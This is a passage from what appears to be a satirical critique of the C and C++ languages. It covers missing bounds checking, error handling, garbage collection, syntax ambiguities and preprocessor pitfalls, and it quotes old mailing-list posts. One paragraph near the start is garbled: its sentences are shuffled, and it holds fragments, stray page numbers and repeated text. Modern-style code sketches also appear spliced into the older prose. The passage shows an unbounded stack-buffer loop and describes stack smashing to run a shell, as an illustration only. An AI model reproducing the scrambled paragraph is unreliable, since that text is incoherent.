The C language is minimal. It was designed to be compiled efficiently on a wide variety of computer hardware and, as a result, has language constructs that map easily onto computer hardware.

At the time Unix was created, writing an operating system's kernel in a high-level language was a revolutionary idea. The time has come to write one in a language that has some form of error checking.

C is a lowest-common-denominator language, built at a time when the lowest common denominator was quite low. If a PDP-11 didn't have it, then C doesn't have it. The last few decades of programming language research have shown that adding linguistic support for things like error handling, automatic memory management, and abstract data types can make it dramatically easier to produce robust, reliable software. C incorporates none of these findings. Because of C's popularity, there has been little motivation to add features such as data tags or hardware support for garbage collection into the last, current, and next generation of microprocessors: these features would amount to nothing more than wasted silicon, since the majority of programs, written in C, wouldn't use them.
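One concrete instance of what C leaves out: arithmetic that exceeds its type just wraps silently for unsigned types (and is undefined behavior outright for signed ones). A tiny illustration using uint32_t, where at least the wrap is well defined; add_u32 is our name for the sketch:

```c
#include <assert.h>
#include <stdint.h>

/* No trap, no error code, no exception: the sum just wraps modulo 2^32.
 * The usual C "solution" is to pick a wider type and hope. */
static uint32_t add_u32(uint32_t a, uint32_t b)
{
    return a + b;
}
```

The language offers no hook for noticing the wrap; any checking is left to the programmer, which is exactly the point the surrounding text is making.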
“It Can’t Be a Bug. if you have: char *str = "bugy”. huh? This duality can be commonly seen in the way C programs handle character arrays. Array variables are used interchangeably as pointers and as arrays. you might want to ensure that a piece of code doesn’t scribble all over arbitrary pieces of memory. like the program’s stack. Therefore it’s equally valid to write index[array]. especially if the piece of memory in question is important. To belabor the point. Why should it? The arrays are really just pointers. This brings us to the first source of bugs mentioned in the Miller paper. array[index]. …then the following equivalencies are also true: 0[str] *(str+1) *(2+str) str[3] Isn’t C grand? The problem with this approach is that C doesn’t do any automatic bounds checking on the array references. Many of the programs that crashed did so while reading input into a character buffer that was allocated on the call stack. The solution when using C is simply to use integers that are larger than the problem you have to deal with—and hope that the problem doesn’t get larger during the lifetime of your program. written in C. right? Well. There is an array indexing expression. wouldn’t use them. which is also shorthand for (*(array+index)). and you can have pointers to anywhere in memory. It has something that looks like an array but is really a pointer to a memory location. My Makefile Depends on It!” 191 features would amount to nothing more than wasted silicon since the majority of programs. that is merely shorthand for the expression (*(array + index)). == == == == 'b' 'u' 'g' 'y' . C doesn’t really have arrays either. Recall that C has no way to handle integer overflow. Clever. Many C programs do this. the following C function reads a line of input into a stack-allocated array and then calls do_it on the line of input.
Many C programs do this; the following C function reads a line of input into a stack-allocated array and then calls do_it on the line of input:

    a_function()
    {
        char c, buff[80];
        int i = 0;

        while ((c = getchar()) != '\n')
            buff[i++] = c;
        buff[i] = '\000';
        do_it(buff);
    }

Code like this litters Unix. Note how the stack buffer is 80 characters long—because most Unix files only have lines that are 80 characters long. Note also how there is no bounds check before a new character is stored in the character array and no test for an end-of-file condition. The bounds check is probably missing because the programmer likes how the assignment statement (c = getchar()) is embedded in the loop conditional of the while statement. There is no room to check for end-of-file because that line of code is already testing for the end of a line. Believe it or not, some people actually praise C for just this kind of terseness—understandability and maintainability be damned! Finally, do_it is called, and the character array suddenly becomes a pointer, which is passed as the first function argument.

Exercise for the reader: What happens to this function when an end-of-file condition occurs in the middle of a line of input?

When Unix users discover these built-in limits, they tend not to think that the bugs should be fixed. Instead, users develop ways to cope with the situation. For example, tar, the Unix "tape archiver," can't deal with path names longer than 100 characters (including directories). Solution: don't use tar to archive directories to tape; use dump. Better solution: don't use deep subdirectories, so that a file's absolute path name is never longer than 100 characters. The ultimate example of careless Unix programming will probably occur at 10:14:07 p.m. on January 18, 2038, when Unix's 32-bit timeval field overflows…
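For contrast, here is what a bounds-checked version of a_function's input loop might look like, sketched by us with the Standard C fgets function (the function name is ours). fgets refuses to write past the end of the buffer, so an 85-character line cannot scribble over the stack:

```c
#include <stdio.h>
#include <string.h>

/* Reads one line into buff, never storing more than size bytes.
   Returns 1 on success, 0 on end-of-file or error -- the very case
   a_function silently mishandles. */
int read_line_safely(FILE *in, char *buff, size_t size) {
    if (fgets(buff, (int)size, in) == NULL)
        return 0;                       /* EOF or read error */
    buff[strcspn(buff, "\n")] = '\0';   /* strip the trailing newline */
    return 1;
}
```

A line longer than the buffer is simply split across calls instead of overwriting whatever happens to follow the array.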
To continue with our example, let's imagine that our function is called upon to read a line of input that is 85 characters long. The function will read the 85 characters with no problem, but where do the last 5 characters end up? The answer is that they end up scribbling over whatever happened to be in the 5 bytes right after the character array. What was there before? The two variables, c and i, might be allocated right after the character array and therefore might be corrupted by the 85-character input line. What about an 850-character input line? It would probably overwrite important bookkeeping information that the C runtime system stores on the stack, such as addresses for returning from subroutine calls. At best, corrupting this information will probably cause a program to crash.

We say "probably" because you can corrupt the runtime stack to achieve an effect that the original programmer never intended. Imagine that our function was called upon to read a really long line, over 2,000 characters, and that this line was set up to overwrite the bookkeeping information on the call stack so that when the C function returns, it will call a piece of code that was also embedded in the 2,000-character line. This embedded piece of code may do something truly useful, like exec a shell that can run commands on the machine. Robert T. Morris's Unix Worm employed exactly this mechanism (among others) to gain access to Unix computers.

Date:    Thu, 2 May 91 18:16:44 PDT
From:    Jim McDonald <jlm%missoula@lucid.com>
To:      UNIX-HATERS
Subject: how many fingers on your hands?

This was part of a message to my manager today:

    The bug was that a program used to update Makefiles had a pointer that stepped past the array it was supposed to index and scribbled onto some data structures used to compute the dependency lists it was auto-magically writing into a Makefile. The net result was that later on the corrupted Makefile didn't compile everything it should, so necessary .o files weren't being written, so the build eventually died. One full day wasted because some idiot thought 10 includes was the most anyone would ever use, and then dangerously optimized code that was going to run for less than a millisecond in the process of creating X Makefiles!

    The disadvantage of working over networks is that you can't so easily go into someone else's office and rip their bloody heart out. :-(

Exceptional Conditions

The main challenge of writing robust software is gracefully handling errors and other exceptions. Unfortunately, C provides almost no support for handling exceptional conditions. Sad to say, few people learning programming in today's schools and universities know what exceptions are.
Exceptions are conditions that can arise when a function does not behave as expected. Exceptions frequently occur when requesting system services such as allocating memory or opening files. Since C provides no exception-handling support, the programmer must add several lines of exception-handling code for each service request. For example, this is the way that all of the C textbooks say you are supposed to use the malloc() memory allocation function:

    struct bpt *another_function()
    {
        struct bpt *result;

        result = malloc(sizeof(struct bpt));
        if (result == 0) {
            fprintf(stderr, "error: malloc: ???\n");
            /* recover gracefully from the error */
            [...]
            return 0;
        }
        /* Do something interesting */
        [...]
        return result;
    }

The function another_function allocates a structure of type bpt and returns a pointer to the new struct. The code fragment shown allocates memory for the new struct. Since C provides no explicit exception-handling support, the C programmer is forced to write exception handlers for each and every system service request (this is the code in bold).

Many C programmers choose not to be bothered with such trivialities and simply omit the exception-handling code. Their programs look like this:

    struct bpt *another_function()
    {
        struct bpt *result = malloc(sizeof(struct bpt));

        /* Do something interesting */
        return result;
    }

It's simpler, cleaner, and most of the time operating system service requests don't return errors, right? Thus programs ordinarily appear bug-free until they are put into extraordinary circumstances, whereupon they mysteriously fail.

Lisp implementations usually have real exception-handling systems. The exceptional conditions have names like OUT-OF-MEMORY and the programmer can establish exception handlers for specific types of conditions. These handlers get called automatically when the exceptions are raised—no intervention or special tests are needed on the part of the programmer. When used properly, these handlers lead to more robust software.

The programming language CLU also has exception-handling support embedded into the language. Every function definition also has a list of exceptional conditions that could be signaled by that function. Explicit linguistic support for exceptions allows the compiler to grumble when exceptions are not handled. CLU programs tend to be quite robust since CLU programmers spend time thinking about exception-handling in order to get the compiler to shut up. C programs, on the other hand…

Date:    16 Dec 88 16:12:13 GMT
Subject: Re: GNU Emacs
From:    debra@alice.UUCP

In article <448@myab.se> lars@myab.se (Lars Pensj) writes:
    …It is of vital importance that all programs on their own check results of system calls (like write)…

I agree, but unfortunately very few programs actually do this for read and write. It is very common in Unix utilities to check the result of the open system call and then just assume that writing and closing will go well.

Reasons are obvious: programmers are a bit lazy, and the programs become smaller and faster if you don't check. (So not checking also makes your system look better in benchmarks that use standard utilities.)

The author goes on to state that, since most Unix utilities don't check the return codes from write() system calls, it is vitally important for system administrators to make sure that there is free space on all file systems at all times. And it's true: most Unix programs assume that if they can open a file for writing, they can probably write as many bytes as they need.

Things like this should make you go "hmmm." A really frightening thing about the Miller et al. article "An Empirical Study of the Reliability of Unix Utilities" is that the article immediately preceding it tells about how Mission Control at the Johnson Space Center in Houston is switching to Unix systems for real-time data acquisition. Hmmm.

Catching Bugs Is Socially Unacceptable

Not checking for and not reporting bugs makes a manufacturer's machine seem more robust and powerful than it actually is. More importantly, if Unix machines reported every error and malfunction, no one would buy them! This is a real phenomenon.

Date:    Thu, 11 Jan 90 09:07:05 PST
From:    Daniel Weise <daniel@mojave.stanford.edu>
To:      UNIX-HATERS
Subject: Now, isn't that clear?

Due to HP engineering, my HP Unix boxes REPORT errors on the net that they see that affect them. These HPs live on the same net as SUN, MIPS, and DEC workstations. Very often we will have a problem because of another machine, but when we inform the owner of the other machine (who, because his machine throws away error messages, doesn't know his machine is hosed and spending half its time retransmitting packets), he will claim the problem is at our end because our machine is reporting the problem! In the Unix world the messenger is shot.
If You Can't Fix It, Restart It!

So what do system administrators and others do with vital software that doesn't properly handle errors, bad data, and bad operating conditions? Well, if it runs OK for a short period of time, you can make it run for a long period of time by periodically restarting it. The solution isn't very reliable, nor scalable, but it is good enough to keep Unix creaking along.

Here's an example of this type of workaround, which was put in place to keep mail service running in the face of an unreliable named program:

Date:       14 May 91 05:43:35 GMT
From:       tytso@athena.mit.edu (Theodore Ts'o)
Subject:    Re: DNS performance metering: a wish list for bind 4.8.4
Newsgroups: comp.protocols.tcp-ip.domains

[Forwarded to UNIX-HATERS by Henry Minsky.]

This is what we do now to solve this problem: I've written a program called "ninit" that starts named in nofork mode and waits for it to exit. When it exits, ninit restarts a new named. In addition, every 5 minutes, ninit wakes up and sends a SIGIOT to named. This causes named to dump statistical information to /usr/tmp/named.stats. Every 60 seconds, ninit tries to do a name resolution using the local named. If it fails to get an answer back in some short amount of time, it kills the existing named and starts a new one.

We are running this on the MIT nameservers and our mailhub. We find that it is extremely useful in catching nameds that die mysteriously or that get hung for some unknown reason. It's especially useful on our mailhub, since our mail queue will explode if we lose name resolution even for a short time.

Of course, such a solution leaves open an obvious question: how to handle a buggy ninit program? Write another program to fork ninits when they die for "unknown reasons"? But how do you keep that program running?

Such an attitude toward errant software is not unique. The following man page recently crossed our desk. We still haven't figured out whether it's a joke or not. The BUGS section is revealing, as the bugs it lists are the usual bugs that Unix programmers never seem to be able to expunge from their server code:

NANNY(8)            Unix Programmer's Manual            NANNY(8)
NAME
     nanny - A server to run all servers

SYNOPSIS
     /etc/nanny [switch [argument]] [...switch [argument]]

DESCRIPTION
     Most systems have a number of servers providing utilities for
     the system and its users. These servers, unfortunately, tend to
     go west on occasion and leave the system and/or its users
     without a given service. Nanny was created and implemented to
     oversee (babysit) these servers in the hopes of preventing the
     loss of essential services that the servers are providing
     without constant intervention from a system manager or operator.

     In addition, most servers provide logging data as their output.
     This data has the bothersome attribute of using up the disk
     space where it is being stored. On the other hand, the logging
     data is essential for tracing events and should be retained
     when possible. Nanny deals with this overflow by being a
     go-between and periodically redirecting the logging data to new
     files. In this way, the logging data is partitioned such that
     old logs are removable without disturbing the newer data.

     Finally, nanny provides several control functions that allow an
     operator or system manager to manipulate nanny and the servers
     it oversees on the fly.

SWITCHES
     …

BUGS
     A server cannot do a detaching fork from nanny. This causes
     nanny to think that the server is dead and start another one
     time and time again.

     As of this time, nanny can not tolerate errors in the
     configuration file. Thus, bad file names or files that are not
     really configuration files will make nanny die.

     Not all switches are implemented.

     Nanny relies very heavily on the networking facilities provided
     by the system to communicate between processes. If the network
     code produces errors, nanny can not tolerate the errors and
     will either wedge or loop.
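The restart loop at the core of programs like ninit and nanny fits in a dozen lines of C. The sketch below is ours (the name babysit and the restart cap are our additions, the cap so that the example terminates), using the POSIX fork/execv/waitpid calls:

```c
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Runs the program at path, waits for it to die, and restarts it,
   up to max_restarts times. Returns how many times the child ran,
   or -1 if the babysitter itself fails. */
int babysit(const char *path, char *const argv[], int max_restarts) {
    int runs = 0;
    while (runs < max_restarts) {
        pid_t pid = fork();
        if (pid < 0)
            return -1;          /* can't even fork: nannies fail too */
        if (pid == 0) {
            execv(path, argv);
            _exit(127);         /* exec failed in the child */
        }
        int status;
        if (waitpid(pid, &status, 0) < 0)
            return -1;
        runs++;                 /* the server died: go around again */
    }
    return runs;
}
```

Which, of course, leaves exactly the question the posting raises: who babysits the babysitter?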
Restarting buggy software has become such a part of common practice that MIT's Project Athena now automatically reboots its Andrew File System (AFS) server every Sunday morning at 4 a.m. Hope that nobody is up late working on a big problem set due Monday morning…
10
C++
The COBOL of the 90s

Q: Where did the names "C" and "C++" come from?
A: They were grades.
—Jerry Leichter

It was perhaps inevitable that out of the Unix philosophy of not ever making anything easy for the user would come a language like C++.

The idea of object-oriented programming dates back to Simula in the 60s, hitting the big time with Smalltalk in the early 70s. Other books can tell you how using any of dozens of object-oriented languages can make programmers more productive, make code more robust, and reduce maintenance costs. Don't expect to see any of these advantages in C++.

That's because C++ misses the point of what being object-oriented was all about. Instead of simplifying things, C++ sets a new world record for complexity. Like Unix, C++ was never designed, it mutated as one goofy mistake after another became obvious. It's just one big mess of afterthoughts. There is no grammar specifying the language (something practically all other languages have), so you can't even tell when a given line of code is legitimate or not.
Comparing C++ to COBOL is unfair to COBOL, which actually was a marvelous feat of engineering, given the technology of its day. The only marvelous thing about C++ is that anyone manages to get any work done in it at all. Fortunately, most good programmers know that they can avoid C++ by writing largely in C, steering clear of most of the ridiculous features that they'll probably never understand anyway. Usually, this means writing their own non-object-oriented tools to get just the features they need. Of course, this means their code will be idiosyncratic, unreadable, incompatible, and impossible to understand or reuse. But a thin veneer of C++ here and there is just enough to fool managers into approving their projects.

Companies that are now desperate to rid themselves of the tangled, patchwork messes of COBOL legacy code are in for a nasty shock. The ones who have already switched to C++ are only just starting to realize that the payoffs just aren't there. Of course, it's already too late. The seeds of software disasters for decades to come have already been planted and well fertilized.

The Assembly Language of Object-Oriented Programming

There's nothing high-level about C++. To see why, let us look at the properties of a true high-level language:

• Elegance: there is a simple, easily understood relationship between the notation used by a high-level language and the concepts expressed.

• Abstraction: each expression in a high-level language describes one and only one concept. Concepts may be described independently and combined freely.

• Power: with a high-level language, any precise and complete description of the desired behavior of a program may be expressed straightforwardly in that language.

A high-level language lets programmers express solutions in a manner appropriate to the problem. High-level programs are relatively easy to maintain because their intent is clear. From one piece of high-level source code, modern compilers can generate very efficient code for a wide variety of platforms, so high-level code is naturally very portable and reusable.

A low-level language demands attention to myriad details, most of which have more to do with the machine's internal operation than with the problem being solved. Not only does this make the code inscrutable, but it builds in obsolescence. As new systems come along, practically every other year these days, low-level code becomes out of date and must be manually patched or converted at enormous expense.

Pardon Me, Your Memory Is Leaking…

High-level languages offer built-in solutions to commonly encountered problems. For example, it's well known that the vast majority of program errors have to do with memory mismanagement. Before you can use an object, you have to allocate some space for it, initialize it properly, keep track of it somehow, and dispose of it properly. Of course, each of these tasks is extraordinarily tedious and error-prone, with disastrous consequences for the slightest error. Detecting and correcting these mistakes are notoriously difficult, because they are often sensitive to subtle differences in configuration and usage patterns for different users.

Use a pointer to a structure (but forget to allocate memory for it), and your program will crash. Use an improperly initialized structure, and it corrupts your program, and it will crash, but perhaps not right away. Fail to keep track of an object, and you might deallocate its space while it's still in use. Crash city. Better allocate some more structures to keep track of the structures that you need to allocate space for. But if you're conservative, and never reclaim an object unless you're absolutely sure it's no longer in use, watch out. Pretty soon you'll fill up with unreclaimed objects, run out of memory, and crash. This is the dreaded "memory leak." What happens when your memory space becomes fragmented? The remedy would normally be to tidy things up by moving the objects around, but you can't in C++—if you forget to update every reference to every object correctly, you corrupt your program and you crash.

Most real high-level languages give you a solution for this—it's called a garbage collector. It tracks all your objects for you, recycles them when they're done, and never makes a mistake. When you use a language with a built-in garbage collector, several wonderful things happen:

• The vast majority of your bugs immediately disappear. Now, isn't that nice?

• Your code becomes much smaller and easier to write and understand, because it isn't cluttered with memory-management details.

• Your code is more likely to run at maximum efficiency on many different platforms in many different configurations.
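Without a collector, the "keeping track" described above usually ends up as hand-rolled reference counting. The sketch below is ours, not the book's; forget a single retain/release pair and you get exactly the leaks and dangling pointers just listed:

```c
#include <stdlib.h>

/* A minimal reference-counted cell: the manual bookkeeping that a
   garbage collector would otherwise do for you. */
typedef struct {
    int refcount;
    int value;
} cell;

cell *cell_new(int value) {
    cell *c = malloc(sizeof *c);
    if (c == NULL)
        return NULL;         /* the malloc check from the last chapter */
    c->refcount = 1;
    c->value = value;
    return c;
}

void cell_retain(cell *c) {
    c->refcount++;
}

/* Returns 1 if this release freed the cell, 0 if references remain.
   Call it too often and you free live memory; too rarely, and it
   leaks. */
int cell_release(cell *c) {
    if (--c->refcount == 0) {
        free(c);
        return 1;
    }
    return 0;
}
```

Every module in the program must agree to this protocol perfectly, forever, or the whole thing comes down.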
C++ users, alas, are forced to pick up their garbage manually. Many have been brainwashed into thinking that somehow this is more efficient than using something written by experts especially for the platform they use. These same people probably prefer to create disk files by asking for platter, track, and sector numbers instead of by name. It may be more efficient once or twice on a given configuration, but you sure wouldn't want to use a word processor this way.

You don't even have to take our word for it. Go read The Measured Cost of Conservative Garbage Collection by B. Zorn (Technical Report CU-CS-573-92, University of Colorado at Boulder), which describes the results of a study comparing performance of programmer-optimized memory management techniques in C versus using a standard garbage collector. C programmers get significantly worse performance by rolling their own.

OK, suppose you're one of those enlightened C++ programmers who wants a garbage collector. You're not alone, lots of people agree it's a good idea, and they try to build one. Oh my, guess what. It turns out that you can't add garbage collection to C++ and get anything nearly as good as a language that comes with one built-in. For one thing, (surprise!) the objects in C++ are no longer objects when your code is compiled and running. They're just part of a continuous hexadecimal sludge. There's no dynamic type information—no way any garbage collector (or for that matter, a user with a debugger) can point to any random memory location and tell for sure what object is there, what its type is, and whether someone's using it at the moment.

The second thing is that even if you could write a garbage collector that only detected objects some of the time, you'd still be screwed if you tried to reuse code from anyone else who didn't use your particular system. And since there's no standard garbage collector for C++, this will most assuredly happen. Let's say I write a database with my garbage collector, and you write a window system with yours. When you close one of your windows containing one of my database records, your window wouldn't know how to notify my record that it was no longer being referenced. These objects would just hang around until all available space was filled up—a memory leak, all over again.
Hard to Learn and Built to Stay That Way

C++ shares one more important feature with assembly language—it is very difficult to learn and use, and even harder to learn to use well.

Date:    Mon, 8 Apr 91 11:29:56 PDT
From:    Daniel Weise <daniel@mojave.stanford.edu>
To:      UNIX-HATERS
Subject: From their cradle to our grave.

One reason why Unix programs are so fragile and unrobust is that C coders are trained from infancy to make them that way. For example, one of the first complete programs in Stroustrup's C++ book (the one after the "hello world" program, which, by the way, compiles into a 300K image), is a program that performs inch-to-centimeter and centimeter-to-inch conversion. The user indicates the unit of the input by appending "i" for inches and "c" for centimeters. Here is the outline of the program, written in true Unix and C style:

    #include <stream.h>

    main() {
        [declarations]
        cin >> x >> ch;
            ;; A design abortion.
            ;; This reads x, then reads ch.
        if (ch == 'i') [handle "i" case]
        else if (ch == 'c') [handle "c" case]
        else in = cm = 0;
            ;; That's right, don't report an error.
            ;; Just do something arbitrary.
        [perform conversion]
    }

Thirteen pages later (page 31), an example is given that implements arrays with indexes that range from n to m, instead of the usual 0 to m. If the programmer gives an invalid index, the program just blithely returns the first element of the array. Unix brain death forever!
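What the range-checked array should have done is refuse the invalid index instead of blithely returning the first element. A sketch of ours in C, using the same n-to-m indexing the mail describes:

```c
#include <stdio.h>

/* Access element i of an array indexed from n to m; reports bad
   indexes instead of silently returning something arbitrary.
   Returns 0 on success, -1 on a range error. */
int checked_get(const int *arr, int n, int m, int i, int *out) {
    if (i < n || i > m) {
        fprintf(stderr, "index %d out of range [%d..%d]\n", i, n, m);
        return -1;              /* an error, not the first element */
    }
    *out = arr[i - n];          /* element 0 of storage holds index n */
    return 0;
}
```

The caller is forced to decide what a bad index means, instead of quietly computing with the wrong data.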
Syntax Syrup of Ipecac

Syntactic sugar causes cancer of the semi-colon.
—Alan Perlis

Practically every kind of syntax error you can make in the C programming language has been redefined in C++, so that now it produces compilable code. Unfortunately, these syntax errors don't always produce valid code. The reason is that people aren't perfect. They make typos. In C, no matter how bad it is, these typos are usually caught by the compiler. In C++ they slide right through, promising headaches when somebody actually tries to run the code.

C++'s syntactical stew owes itself to the language's heritage. C++ was never formally designed: it grew. As C++ evolved, a number of constructs were added that introduced ambiguities into the language. Ad hoc rules were used to disambiguate these. The result is a language with nonsensical rules that are so complicated they can rarely be learned. Instead, most programmers keep them on a ready-reference card, or simply refuse to use all of C++'s features and merely program with a restricted subset.

For example, there is a C++ rule that says any string that can be parsed as either a declaration or a statement is to be treated as a declaration. Parser experts cringe when they read things like that because they know that such rules are very difficult to implement correctly. AT&T didn't even get some of these rules correct. For example, when Jim Roskind was trying to figure out the meanings of particular constructs—pieces of code that he thought reasonable humans might interpret differently—he wrote them up and fed them to AT&T's "cfront" compiler. Cfront crashed.

Indeed, if you pick up Jim Roskind's free grammar for C++ from the Internet host ics.uci.edu, you will find the following note in the file c++grammar2.0.tar.Z in the directory ftp/pub:

    "It should be noted that my grammar cannot be in constant
    agreement with such implementations as cfront because a) my
    grammar is internally consistent (mostly courtesy of its formal
    nature and yacc verification), and b) yacc generated parsers
    don't dump core. (I will probably take a lot of flack for that
    last snipe, but… every time I have had difficulty figuring what
    was meant syntactically by some construct that the ARM was vague
    about, and I fed it to cfront, cfront dumped core.)"
Date: Sun, 21 May 89 18:02:14 PDT
From: tiemann (Michael Tiemann)
To:   sdm@cs.brown.edu
Cc:   UNIX-HATERS
Subject: C++ Comments

    Date: 21 May 89 23:59:37 GMT
    From: sdm@cs.brown.edu (Scott Meyers)
    Newsgroups: comp.lang.c++
    Organization: Brown University Dept. of Computer Science

    Consider the following C++ source line:

        //**********************

    How should this be treated by the C++ compiler? The GNU g++
    compiler treats this as a comment-to-EOL followed by a bunch of
    asterisks, but the AT&T compiler treats it as a slash followed by
    an open-comment delimiter. I want the former interpretation, and
    I can't find anything in Stroustrup's book that indicates that
    any other interpretation is to be expected.

    Actually, compiling -E quickly shows that the culprit is the
    preprocessor, so my questions are:

    1. Is this a bug in the AT&T preprocessor? If not, why not? If
       so, will it be fixed in 2.0, or are we stuck with it?
    2. Is it a bug in the GNU preprocessor? If so, why?

    Scott Meyers
    sdm@cs.brown.edu

There is an ancient rule for lexing UNIX that the token that should be accepted be the longest one acceptable. Thus 'foo' is not parsed as three identifiers, 'f', 'o', and 'o', but as one, 'foo'. See how useful this rule is in the following program (and what a judicious choice '/*' was for delimiting comments):

    double qdiv (p, q)
        double *p, *q;
    {
        return *p/*q;
    }

So why is the same rule not being applied in the case of C++? Simple. It's a bug.

Michael
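The greedy lexer really does swallow the body of qdiv: *p/*q lexes as *p followed by the comment-opener /*. A single space restores the intended division (our illustration, not part of the mail):

```c
/* "*p/*q" starts a comment at the slash-star; a space keeps the
   division operator and the dereference apart. */
double qdiv_fixed(const double *p, const double *q) {
    return *p / *q;    /* NOT "*p/*q" */
}
```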
Worst of all, the biggest problem with C++, for those who use it on a daily basis, is that even with a restricted subset, the language is hard to read and hard to understand. It is difficult to take another programmer's C++ code, look at it, and quickly figure out what it means. The language shows no taste. It's an ugly mess. C++ is a language that wants to consider itself object-oriented without accepting any of the real responsibilities of object orientation. C++ assumes that anyone sophisticated enough to want garbage collection, dynamic loading, or other similar features is sophisticated enough to implement them for themselves and has the time to do so and debug the implementation.

The real power of C++'s operator overloading is that it lets you turn relatively straightforward code into a mess that can rival the worst APL, ADA, or FORTH code you might ever run across. Every C++ programmer can create their own dialect, which can be a complete obscurity to every other C++ programmer. But—hey—with C++, even the standard dialects are private ones.

Abstract What?

You might think C++'s syntax is the worst part, but that's only when you first start learning it. Once you get underway writing a major project in C++, you begin to realize that C++ is fundamentally crippled in the area of abstraction. As any computer science text will tell you, this is the principal source of leverage for sensible design.

Complexity arises from interactions among the various parts of your system. If you have a 100,000-line program, and any line of code may depend on some detail appearing in any other line of code, you have to watch out for 10,000,000,000 possible interactions. Abstraction is the art of constraining these interactions by channeling them through a few well-documented interfaces. A chunk of code that implements some functionality is supposed to be hidden behind a wall of modularity.

Classes, which are the whole point of C++, are actually implemented in a way that defies modularity. They expose the internals to such an extent that the users of a class are intimately dependent on the implementation details of that class. In most cases, changing a class forces a recompile of all code that could possibly reference it. This typically brings work to a standstill while entire systems must be recompiled. Your software is no longer "soft" and malleable; it's more like quick-setting cement.

Of course, you have to put half of your code in the header files, just to declare your classes to the rest of the world. Of course, the public/private distinctions provided by a class declaration are worthless since the "private" information is in the headers and is therefore public information. Once there, you're loath to change them, thereby forcing a dreaded recompile. Programmers start to go to extraordinary lengths to add or change functionality through twisted mechanisms that avoid changing the headers. They may run into some of the other protection mechanisms, but since there are so many ways to bypass them, these are mere speedbumps to someone in a hurry to violate protocol. Cast everything as void* and presto, no more annoying type checking.

Many other languages offer thoughtfully engineered mechanisms for different kinds of abstraction. C++ offers some of these, but misses many important kinds. The kinds it does offer are confused and hard to understand. Have you ever met anyone who actually likes using templates? The result is that the way many kinds of concepts are expressed depends on the context in which they appear and how they are used. Many important concepts cannot be expressed in a simple way at all; nor, once expressed, can they be given a name that allows them subsequently to be invoked directly.

For example, a namespace is a common way of preventing one set of names appropriate to one part of your code from colliding with another set of names from another part. A program for a clothing manufacturer may have a class called Button, and it may be linked with a user interface toolkit with another class called Button. With namespaces, this is no problem, since the rules for the usage and meaning of both concepts are clear and easy to keep straight.

Not so in C++. There's no way to be sure you haven't taken a name used somewhere else in your program, with possibly catastrophic consequences. Your only hope is to garble up your code with nonsensical prefixes like ZjxButton and hope nobody else does the same.

Date:    Fri, 18 Mar 94 10:52:58 PST
From:    Scott L. Burson <gyro@zeta-soft.com>
Subject: preprocessor
C weenies will tell you that one of the best features of C is the preprocessor. Actually, it is probably the worst. Many C programs are unintelligible rats' nests of #ifdefs. (Almost none of which would be there if the various versions of Unix were actually compatible.) But that's only the beginning.

The worst problem with the C preprocessor is that it locks the Unix world into the text-file prison and throws away the key. It is virtually impossible to usefully store C source code in any form other than linear text files. Why? Because it is all but impossible to parse unpreprocessed C code. Consider, for instance:

    #ifdef BSD
    int foo() {
    #else
    void foo() {
    #endif
        /* ... */
    }

Here the function foo has two different beginnings, depending on whether the macro 'BSD' has been defined or not. To parse stuff like this in its original form is all but impossible (to our knowledge, it's never been done).

Why is this so awful? Because it limits the amount of intelligence we can put into our programming environments. Most Unix programmers aren't used to having such environments and don't know what they're missing, but there are all kinds of extremely useful features that can easily be provided when automated analysis of source code is possible.

Let's look at an example. For most of the time that C has been around, the preprocessor has been the only way to get expressions open-coded (compiled by being inserted directly into the instruction stream, rather than as a function call). For very simple and commonly used expressions, open-coding is an important efficiency technique. For instance, min, which we were just talking about above, is commonly defined as a preprocessor macro:

    #define min(x,y) ((x) < (y) ? (x) : (y))

Suppose you wanted to write a utility to print a list of all functions in some program that reference min. Sounds like a simple task, right? But you can't tell where function boundaries are without parsing the program, and you can't parse the program without running it through the preprocessor, and once you have done that, all occurrences of min have been removed! So you're stuck with running grep.

There are other problems with using the preprocessor for open-coding. In the min macro just displayed, for instance, you will notice a number of apparently redundant parentheses. In fact, these parentheses must all be provided, or else when the min macro is expanded within another expression, the result may not parse as intended. (Actually, they aren't all necessary—which ones may be omitted, and why, is left as an exercise for the reader.)

But the nastiest problem with this min macro is that although a call to it looks like a function call, it doesn't behave like a function call. Consider:

    a = min(b++, c);

By textual substitution, this will be expanded to:

    a = ((b++) < (c) ? (b++) : (c))

So if 'b' is less than 'c', 'b' will get incremented twice rather than once, and the value returned will be the original value of 'b' plus one. If min were a function, on the other hand, 'b' would get incremented only once, and the returned value would be the original value of 'b'.

C++ Is to C as Lung Cancer Is to Lung

"If C gives you enough rope to hang yourself, then C++ gives you enough rope to bind and gag your neighborhood, rig the sails on a small ship, and still have enough rope to hang yourself from the yardarm."
—Anonymous
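Before leaving the preprocessor behind: the double evaluation described above is easy to demonstrate. In this sketch of ours, one call to the macro increments b twice, exactly as claimed, while a plain function evaluates each argument once:

```c
#define min(x,y) ((x) < (y) ? (x) : (y))

/* A real function: each argument is evaluated exactly once. */
int min_int(int x, int y) {
    return x < y ? x : y;
}

/* How many times does one call bump b? Two for the macro... */
int macro_increments(void) {
    int b = 1, c = 5;
    (void)min(b++, c);     /* expands to ((b++) < (c) ? (b++) : (c)) */
    return b - 1;
}

/* ...but only one for the function. */
int func_increments(void) {
    int b = 1, c = 5;
    (void)min_int(b++, c);
    return b - 1;
}
```

The macro version tests b++ (incrementing it) and then, having chosen the smaller operand, evaluates b++ a second time.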
Over the past few years, C++ has become quite popular; it's quickly becoming a line item on resumes, so it's probably in the best interest of every computer scientist and serious programmer to learn C++. Sadly, though, we've known many programmers who know how to program in C++, who can even write reasonably good programs in the language…

…but they hate it.
The Evolution of a Programmer

[We'd love to assign credit for this, but it's been whizzing around Cyberspace for so long that the task would probably be impossible. —Eds.]

High school/Junior high

    10 PRINT "HELLO WORLD"
    20 END

First year in college

    program Hello(input, output);
    begin
      writeln ('Hello world');
    end.

Senior year in college

    (defun hello ()
      (print (list 'HELLO 'WORLD)))

New professional

    #include <stdio.h>
    main (argc, argv)
    int argc;
    char **argv;
    {
      printf ("Hello World!\n");
    }
Seasoned pro

    #include <stream.h>

    const int MAXLEN = 80;

    class outstring;
    class outstring {
    private:
        int size;
        char str[MAXLEN];
    public:
        outstring() { size=0; }
        ~outstring() { size=0; }
        void print();
        void assign(char *chrs);
    };

    void outstring::print() {
        int i;
        for (i=0; i<size; i++)
            cout << str[i];
        cout << "\n";
    }

    void outstring::assign(char *chrs) {
        int i;
        for (i=0; chrs[i] != '\0'; i++)
            str[i] = chrs[i];
        size=i;
    }

    main (int argc, char **argv) {
        outstring string;
        string.assign("Hello World!");
        string.print();
    }

Manager

